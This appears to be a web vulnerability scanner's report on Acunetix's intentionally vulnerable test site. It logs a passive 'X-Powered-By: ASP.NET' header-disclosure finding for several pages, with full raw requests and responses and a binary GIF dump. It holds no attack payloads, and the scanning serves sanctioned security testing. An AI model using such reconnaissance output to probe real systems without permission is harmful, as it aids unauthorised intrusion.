href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/about.aspx
Method	GET
Parameter
Attack
Evidence	X-Powered-By: ASP.NET
Show / hide Request and Response
Request Header - size: 322 bytes.	GET http://testaspnet.vulnweb.com/about.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 14619
Response Body - size: 14,619 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>About</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="about.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKqq9H0CQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMr7fvEMmSiYYPLDantQRZkqAblw" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <h1>About this website</h1> <p>The website was built with the intention to test the Acunetix Web Vulnerability Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate the forementioned software's capabilities to find those bugs.</p> <p><b>Please DO NOT use this website as a blog or news site. DO NOT post any sensitive information on this site. This includes e-mail addresses or real names.</b></p> <h1>About Acunetix</h1> <P><B>Combating the web vulnerability threat<BR> </B>Securing a company's web applications is today's most overlooked aspect of securing the enterprise. Web application hacking is on the rise with as many as 75% of cyber attacks done at web application level or via the web. Most corporations have secured their data at the network level, but have overlooked the crucial step of checking whether their web applications are vulnerable to attack. Web applications, which often have a direct line into the company's most valuable data assets, are online 24/7, completely unprotected by a firewall and therefore easy prey for attackers.</P> <P>Acunetix was founded with this threat in mind. We realised the only way to combat web site hacking was to develop an automated tool that could help companies scan their web applications for vulnerabilities. In July 2005, Acunetix Web Vulnerability Scanner was released - a tool that crawls the website for vulnerabilities to SQL injection, cross site scripting and other web attacks before hackers do.</P> <P>The Acunetix development team consists of highly experienced security developers who have each spent years developing network security scanning software prior to starting development on Acunetix WVS. The management team is backed by years of experience marketing and selling security software.</P> <P>Acunetix is a privately held company with its <A href="https://www.acunetix.com/company/contact/"> offices</A> in Malta, US and the UK. </P> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ads/acunetix.gif
Method	GET
Parameter
Attack
Evidence	X-Powered-By: ASP.NET
Show / hide Request and Response
Request Header - size: 341 bytes.	GET http://testaspnet.vulnweb.com/ads/acunetix.gif HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/ads/def.html Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 247 bytes.	HTTP/1.1 200 OK Content-Type: image/gif Last-Modified: Thu, 29 May 2008 14:36:52 GMT Accept-Ranges: bytes ETag: "eb3686f99c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 3048
Response Body - size: 3,048 bytes.	GIF89a ÷å1:555øõõäääÑÑÑªªªÚÚÚiiiúÕÖä3¯®® ÒÒÒ111î\|èCJèMT¼¼¼æææáááõ²µä$-êU[þüüAAA^^^æ:Bvvv>>>§§§â!÷ââímrá ÁÁÁùÌÎºººìz···òTTTò«®íkkk¸¸¸cccmmmï ìdjÃÃÃNNN"""ñ¿Áìqvò¥§zzzttt888ñØØØÕÕÕrssfffËËËýóóùññ÷æç÷ÝÝZZZ}}}FFFDDDó»½HHHçFM---¾¿¿æBISSS%%%```&&&XXXâøÇÉxxx JJJé_e*:::©¨¨ïâêioã$â!áæ/8ä(âùùù÷÷÷øøøÿþþÿÿþÿþÿþÿÿþþÿþÿþðððeeeõõõúûúíííóóó´´´°°°ùùúûúúúúûìììñññ÷÷øôôôûûúýýý÷ø÷ïïïµµµòòòëëëêêêøø÷¤¤¤èèèÌÌÌÍÍÍßßßÈÈÈ³³³ø÷ø¡¡¡ÇÇÇîîî²²²~~~ QQQùúú¥¥¥ùúù×××ÜÜÜÏÏÏ÷øøãããÝÝÝÆÆÆLLLöÑÓpppð¢¢¢ûûüûøødddâââúÜÝíç@GÉÉÉÞÞÞþúúoooñðñòúûûOOOÝÜÝðûÝßôôõõõôúÙÚððñôÉËèHNâãâó¡îw\|î¤¨ë`fïîqxíäRQQôÆÈûßàííîóÝÞöÚÚúÏÑð°ã&ñ´¶á{{{ÅÅÅøÞßöÁÂúúùûÞßîûàâúêëùÓÔýïïöööûûûúúúþþþüüüá ÿÿÿ!ù, ÿ÷ H° Á\È°¡Ã oÁ²` `rP/O=~öé§?zòDÊÉã¾>}Æ\|Ó£>\|þå8'L0ùÀyr'A=æÙóï_Hì¹ç?=2O\ºàÓ¡Mkº¬Jðþ¤i?Jû>õsO×{\|5µûÏI=ÿ~ÁãeC,´s/ß¦æÁ9r¤ã=V¹b&iÕ©È8û(\|õsSÀ!k;§ë=û ügçß=}¬ÚÕc©²hìÞÄ¾§÷IæÚ'¬ÞÈ£AÓ¯ºuën0X@½»÷ïàÃÿO¾\|xFÀÓFÔcæÿñëîäëøñC(c>ßA(WÞ>Lòñ%Ç)äSÿázÁu'`\|F&ùuxEGÀÁÀÍhò-ÀÝÐg0TIdrxtgGòAS¨p£üSÁ.jØè§gGSh;l°Â\|ýÑ Q ¥Å2¬ðO3ìrÀ ÿ°"Ãü&d½2ÃDj7y\|HeºåÖ¬¸UHdùÀÂ¢æ d !Ý²Z4ÏhU±ÂY:cwM¬A©[V4ÿÙ¾JÉ?¸uÈ?àV%Íî@ö' JÂB¯ºe¾úóhS¢;ÐT¦þlÚé§þ©á±·@ÇIhEQ-ZÒÑÞj®M©â@6[G6uÈ&lé´XÐð9ÌÖµÿl è8¼¢ðª1È?à§ 6ÅºhEBx0ïÅ¨ S"xá¡ü CTñÏ¾híÚÔnuÐT%nÁðÏÿ¤ ðÖt¿ñê!ðZÛ&ÒuSáOY2§'kîÊn!Jd¯$ÿÊÀ¥ÿ<â[@·Hnafz4¥Óþ8ý-ä2ðÉ> åÀÈóPÂrÈ¡ðÙ9ZbwWÀ¼FâáÞó·ßjJwd(«2ËöB'[l4Õ[SxGyË%4E¡zA.ù?©TÛLôÂ)ß?Ü PÄJ:MR-à \|ñzpgxsò¹hqIw1¸õCS¸ #A¨)qqt: -´¨2ü<D Ð:yXÆ}<Ô¦XÂ-¨'õ¢Åå_Ýæ7¬amñDµPÑ8ÌawÀ 5_YÿÕÈð#¼þaÌm¨Ùá!pgnÙÛwJPG©À-J# qg·Ý¡EÌ'fø?¤g[¯ÒB×¸6 Òòmà!8Pã#Àìñ6x øÜò ðPm}`óGÉÃMÝoº£?ÐØ5ðfiÙÀ@ÊRg¨ÂþAÇ12tKÈ¡½/èða8xÈø([bÓípËð! âóÏ<½fÍ¤GÅ$Äé<hâ¢Z«ÀÇ#Ðe àcèLç þ@t¢H Y·<ã¡P´aÿLB\ÀCÛÀ:$à#b>P+"4ø¸Å ^h&&ÀcRuÐ¬'ZÚÍmvóßDK8ñÁ@´t¢øèú£ô´ç1;q:/ j3Å!&ÞªÁÒà!^Üá9p@ñÔªv ZÀSà! ªOÅG2üÑY<µWhÀ!¢%O}Ä6ñÖ§-xª'jÅÔõhAªÂUþ ÂZR<¬2hÙf<âPÖÑ.x(¤Àº! Il!QþØA91 pbpYÅ$°¡·ÿ 8´ØDoýaGL`8°©?< F4bs ni%A»¾ØM&Z"à¡ÕÐlýÑ<Â¹p4QZ4vÀC-¾èRój-AhD Ú¡aà! »Î þæ§xH0,(Å5-H0Q¶(!ûqñFÀb(±Í;HXÂÖ¥OEEÀU°!ZvSÀhéÐQ$¸µ &Lô xh\|` Àý A ìP¢æç vÈ²~ZJyÕ2íPnË8³tP6EEÿc&1Z<5Û!ÕêÁ'8nÒvnÀx¿`ûcvFm=1Á-;@ÖúDH! ë\ D<:ù¡Ô t2@%D 3 c¶,Ô`1c0ÁZ®t À}nW°+m\|´Æâ¡fZxAxQ [ E,*k;dÆ@À1±V£vXv`¨9U@Àkdú:qÐ>ö)\AOà·>&7\àEP¡ ìûø¾ïK4áH 2AñS 8(Ðq}\"âÅè8">@©8Â( 0;\à(ÆÃ#þ\|xçø ø#ôNèãø!Á<ô¦ßÜÉø¹À9ø-ªÜêú¨º (nuEx}ß_¿¹Ó~sªoß^Çú¾µ¬ìÜõ¡¹âsï83Þ\|äÄ²à¿þðÏÇ;F 8\ÀºH¼ä'OùÊ[þòÏ¼æ7?y<ðãó ½èGOúÒþô¨O½êWÏúÖ»þõ°½ìgOûÚÇ> ;
URL	http://testaspnet.vulnweb.com/ads/def.html
Method	GET
Parameter
Attack
Evidence	X-Powered-By: ASP.NET
Show / hide Request and Response
Request Header - size: 363 bytes.	GET http://testaspnet.vulnweb.com/ads/def.html HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 246 bytes.	HTTP/1.1 200 OK Content-Type: text/html Last-Modified: Fri, 24 May 2019 07:50:37 GMT Accept-Ranges: bytes ETag: "eb6cf45f512d51:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:16 GMT Content-Length: 488
Response Body - size: 488 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title></title> <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1"> <meta name="ProgId" content="VisualStudio.HTML"> <meta name="Originator" content="Microsoft Visual Studio .NET 7.1"> </head> <body> <P align="center"><STRONG>Is your website hackable?<BR> check with<BR> <IMG src="acunetix.gif"><BR> Web Vulnerability Scanner</STRONG></P> </body> </html>
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=0
Method	GET
Parameter
Attack
Evidence	X-Powered-By: ASP.NET
Show / hide Request and Response
Request Header - size: 330 bytes.	GET http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 13859
Response Body - size: 13,859 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkZD0ABLMUBs9bepCq8oSQPQHk/TUy" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQKDytHbBQKAgcfvBQKFzrr8AQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBDelgcSNkQi9b3oGhQR0IdatoEdv" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A 